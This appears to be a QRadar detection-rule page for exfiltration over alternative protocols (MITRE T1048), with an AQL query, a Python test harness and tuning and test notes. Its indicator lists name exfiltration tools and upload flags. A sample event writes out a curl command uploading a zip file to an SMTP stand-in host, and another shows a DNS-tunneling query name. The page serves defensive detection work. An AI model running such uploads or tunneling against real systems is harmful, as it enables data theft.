Detect Exfiltration Over Alternative Protocol in IBM QRadar
Adversaries may steal data by exfiltrating it over a different protocol than that used for command and control. Data may be sent over FTP, SMTP, DNS, SMB, HTTP/S, or any other network protocol not serving as the primary C2 channel. Adversaries often encrypt or obfuscate these alternate channels. Common tools include curl, ftp.exe, WinSCP, and built-in OS utilities. DNS tunneling (encoding data in DNS query subdomains) is a particularly stealthy variant used by malware families like FrameworkPOS. IaaS and SaaS platforms (Exchange, SharePoint, GitHub, AWS S3) can also serve as exfiltration endpoints via cloud APIs or direct downloads.
MITRE ATT&CK
- Tactic: Exfiltration
- Canonical reference: https://attack.mitre.org/techniques/T1048/
QRadar Detection Query
-- Branch 1: Exfil tool with upload indicators
SELECT
DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
LOGSOURCENAME(logsourceid) AS LogSource,
sourceip,
username,
"Process Name",
"Command",
'ExfilToolUpload' AS DetectionBranch
FROM events
WHERE
LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
AND QIDNAME(qid) LIKE '%Process Create%'
AND (
LOWER("Process Name") LIKE '%ftp.exe%'
OR LOWER("Process Name") LIKE '%curl.exe%'
OR LOWER("Process Name") LIKE '%winscp.exe%'
OR LOWER("Process Name") LIKE '%pscp.exe%'
OR LOWER("Process Name") LIKE '%sftp.exe%'
OR LOWER("Process Name") LIKE '%bitsadmin.exe%'
OR LOWER("Process Name") LIKE '%robocopy.exe%'
)
AND (
LOWER("Command") LIKE '%-t %'
OR LOWER("Command") LIKE '%--upload-file%'
OR LOWER("Command") LIKE '% put %'
OR LOWER("Command") LIKE '%ftp://%'
OR LOWER("Command") LIKE '%sftp://%'
OR LOWER("Command") LIKE '%ftps://%'
OR LOWER("Command") LIKE '%smtp://%'
OR LOWER("Command") LIKE '%--mail-from%'
OR LOWER("Command") LIKE '%--mail-rcpt%'
)
AND starttime > NOW() - 86400000 -- NOW() and starttime are epoch milliseconds; 86400000 ms = 24 hours
UNION
-- Branch 2: Outbound connections on exfil ports from non-standard processes
SELECT
DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
LOGSOURCENAME(logsourceid) AS LogSource,
sourceip,
username,
"Process Name",
"Command",
'SuspiciousOutboundPort' AS DetectionBranch
FROM events
WHERE
LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
AND QIDNAME(qid) LIKE '%Network Connect%'
AND destinationport IN (21, 22, 25, 465, 587, 989, 990, 2121, 2222)
-- RFC 1918 ranges plus loopback; a LIKE '172.16.%' prefix match would miss 172.17.0.0 through 172.31.255.255
AND NOT (
INCIDR('10.0.0.0/8', destinationip)
OR INCIDR('172.16.0.0/12', destinationip)
OR INCIDR('192.168.0.0/16', destinationip)
OR INCIDR('127.0.0.0/8', destinationip)
)
AND NOT (
LOWER("Process Name") LIKE '%svchost.exe%'
OR LOWER("Process Name") LIKE '%lsass.exe%'
OR LOWER("Process Name") LIKE '%outlook.exe%'
OR LOWER("Process Name") LIKE '%thunderbird.exe%'
OR LOWER("Process Name") LIKE '%filezilla.exe%'
)
AND starttime > NOW() - 86400000 -- 24 hours in milliseconds
UNION
-- Branch 3: DNS tunneling via long subdomain queries
SELECT
DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS EventTime,
LOGSOURCENAME(logsourceid) AS LogSource,
sourceip,
username,
"Process Name",
"DNS Query" AS "Command",
'DNSTunnelingSuspect' AS DetectionBranch
FROM events
WHERE
LOGSOURCETYPEID(logsourceid) IN (12, 13, 14, 352)
AND QIDNAME(qid) LIKE '%DNS%'
AND STRLEN("DNS Query") > 50
AND NOT (
"DNS Query" LIKE '%.microsoft.com'
OR "DNS Query" LIKE '%.windows.com'
OR "DNS Query" LIKE '%.google.com'
OR "DNS Query" LIKE '%.amazon.com'
)
AND starttime > NOW() - 86400000 -- 24 hours in milliseconds
ORDER BY EventTime DESC
Three-branch AQL detection covering exfiltration tool usage with upload indicators, outbound connections on FTP/SMTP/SSH ports from unexpected processes, and DNS tunneling via anomalously long DNS query names. All branches are unioned into a single result set for analyst review.
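As an added illustration that is not part of the original page or of QRadar, the following Python replays the three branches' matching logic over a handful of constructed Sysmon-style events, so the indicator lists can be unit-tested outside the SIEM before the AQL is deployed. The event field names and sample values are assumptions; the internal-network check uses full RFC 1918 CIDRs rather than a string prefix, which is the generalisation the query needs for the 172.16.0.0/12 range.

```python
import ipaddress

# Constructed sample events shaped like the QRadar fields the AQL reads
# (Sysmon Process Create / Network Connect / DNS Query); not real telemetry.
SAMPLE_EVENTS = [
    {"qidname": "Process Create", "process": r"C:\Windows\System32\curl.exe",
     "command": r"curl.exe --upload-file C:\Temp\q.zip smtp://203.0.113.5 --mail-rcpt x@y"},
    {"qidname": "Process Create", "process": r"C:\Windows\System32\curl.exe",
     "command": "curl.exe -s https://updates.example/version.json"},
    {"qidname": "Network Connect", "process": r"C:\Users\jdoe\tool.exe",
     "destinationip": "198.51.100.20", "destinationport": 22},
    {"qidname": "Network Connect", "process": r"C:\Users\jdoe\tool.exe",
     "destinationip": "172.20.4.9", "destinationport": 22},  # inside 172.16.0.0/12
    {"qidname": "DNS Query", "process": r"C:\Windows\System32\svchost.exe",
     "dnsquery": "bm90IHJlYWxseSBleGZpbCBkYXRhIGJ1dCBsb25n.df00tech-test.com"},
    {"qidname": "DNS Query", "process": "chrome.exe",
     "dnsquery": "very-long-but-legitimate-cdn-edge-hostname-01.windows.com"},
]

# Indicator lists taken from the three AQL branches.
EXFIL_TOOLS = ("ftp.exe", "curl.exe", "winscp.exe", "pscp.exe", "sftp.exe", "bitsadmin.exe", "robocopy.exe")
UPLOAD_FLAGS = ("-t ", "--upload-file", " put ", "ftp://", "sftp://", "ftps://", "smtp://", "--mail-from", "--mail-rcpt")
EXFIL_PORTS = {21, 22, 25, 465, 587, 989, 990, 2121, 2222}
EXPECTED_CLIENTS = ("svchost.exe", "lsass.exe", "outlook.exe", "thunderbird.exe", "filezilla.exe")
DNS_ALLOWLIST = (".microsoft.com", ".windows.com", ".google.com", ".amazon.com")
# Full RFC 1918 ranges plus loopback: a prefix match on '172.16.' would miss 172.17-172.31.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def classify(ev):
    """Return the DetectionBranch label the query would assign to one event, or None."""
    kind, proc = ev["qidname"].lower(), ev.get("process", "").lower()
    if "process create" in kind:  # Branch 1: exfil tool plus an upload indicator
        cmd = ev.get("command", "").lower()
        if any(t in proc for t in EXFIL_TOOLS) and any(f in cmd for f in UPLOAD_FLAGS):
            return "ExfilToolUpload"
    elif "network connect" in kind:  # Branch 2: exfil port, external target, unexpected process
        dst = ipaddress.ip_address(ev["destinationip"])
        if (ev["destinationport"] in EXFIL_PORTS and not any(dst in n for n in INTERNAL_NETS)
                and not any(c in proc for c in EXPECTED_CLIENTS)):
            return "SuspiciousOutboundPort"
    elif "dns" in kind:  # Branch 3: long query name outside the allowlist
        query = ev.get("dnsquery", "").lower()
        if len(query) > 50 and not query.endswith(DNS_ALLOWLIST):
            return "DNSTunnelingSuspect"
    return None

def run_detection(events):
    """Replay events through all branches; return (process, branch) pairs that fire."""
    return [(ev["process"], label) for ev in events if (label := classify(ev))]
```

Running `run_detection(SAMPLE_EVENTS)` fires once per branch: the curl upload, the external SSH connection from tool.exe, and the long df00tech-test.com query, while the benign curl call, the 172.20.x.x destination and the allowlisted windows.com name stay silent.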
Data Sources
Required Tables
False Positives & Tuning
- IT administrators using WinSCP or pscp.exe for legitimate file transfers to managed Linux servers — scope with approved source IPs or asset groups
- CI/CD pipelines using curl to upload build artifacts to cloud storage (S3, Azure Blob) over port 443 — may match if port mapping triggers alt-port rules
- DNS hostnames for cloud services or CDN providers with long CNAME chains exceeding the 50-char threshold — maintain an allowlist of known long-domain registrants
Testing Methodology
Validate this detection against 5 Atomic Red Team test cases for this technique. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: FTP Upload via Windows Built-in FTP Client
Expected signal: Sysmon Event ID 1: Process Create with Image=ftp.exe, CommandLine containing '-s:%TEMP%\df00tech-ftp.txt'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:21 from ftp.exe. Sysmon Event ID 11: File create for the ftp script file in TEMP.
- Test 2: curl SMTP Exfiltration Simulation
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '--mail-from', '--mail-rcpt', '--upload-file', 'smtp://'. Sysmon Event ID 3: Network Connection to 127.0.0.1:25 from curl.exe. The connection will fail but telemetry events fire.
- Test 3: DNS Tunneling Simulation via Long Subdomain Queries
Expected signal: Sysmon Event ID 22 (DNS Query): 25 events with QueryName containing long base64-encoded subdomains (>50 characters) under df00tech-test.com. DNS queries will fail to resolve (NXDOMAIN) but the DNS telemetry events are generated by the Sysmon DNS query logging provider.
- Test 4: curl Upload via HTTP PUT (Alternative Protocol Exfiltration)
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing '-X PUT', '-T', and 'http://127.0.0.1:8888'. Sysmon Event ID 3: Network Connection to 127.0.0.1:8888. Sysmon Event ID 11: File Create for exfil_test.txt in TEMP directory.
- Test 5: SCP File Exfiltration via OpenSSH (Linux/macOS)
Expected signal: Auditd EXECVE record for scp with arguments including the destination host and port. Network connection event to 198.51.100.1:22. On systems with Sysmon for Linux: Process Create event (EventCode=1) for scp binary, Network Connect (EventCode=3) for the outbound SSH connection attempt.